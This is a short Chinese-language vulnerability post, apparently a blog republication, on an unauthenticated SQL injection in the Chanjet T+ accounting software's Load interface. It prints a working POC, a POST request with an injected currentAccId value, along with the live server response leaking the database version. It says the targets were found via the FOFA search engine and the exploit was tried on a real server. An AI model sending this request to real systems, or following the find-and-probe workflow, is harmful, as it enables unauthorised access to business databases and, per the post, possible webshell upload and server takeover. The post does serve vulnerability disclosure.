畅捷通T+ Load 存在SQL注入漏洞
|
admin
2025年7月17日 21:43
本文热度 28
|
漏洞说明:
由于畅捷通T+的load接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用 SOL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞类型:
数据注入
漏洞特征:
POC:
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load HTTP/1.1
Content-Type: application/json
{"currentAccId":"2' and 1=@@version--+", "currentAcc":"1", "currentDsName":"1", "currentVersion":"1", "currentVersionNo":"1"}
渗透过程:
通过漏洞特征在FOFA找到目标
通过poc拿到数据库版本信息,成功复现漏洞,点到为止
HTTP/1.1 200 OK
Server: nginx/1.9.9
Date: Thu, 26 Jun 2025 14:09:33 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 355
Connection: keep-alive
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
{"error":{"Message":"245 数据库错误, 请重试!\r\n\r\n在将 nvarchar 值 'Microsoft SQL Server 2012 - 11.0.2100.60 (X64) \n\tFeb 10 2012 19:39:15 \n\tCopyright (c) Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )\n' 转换成数据类型 int 时失败。","Type":"Ufida.T.EAP.ErrorInfo.DatabaseException"}}
阅读原文:原文链接
该文章在 2025/7/18 10:42:42 编辑过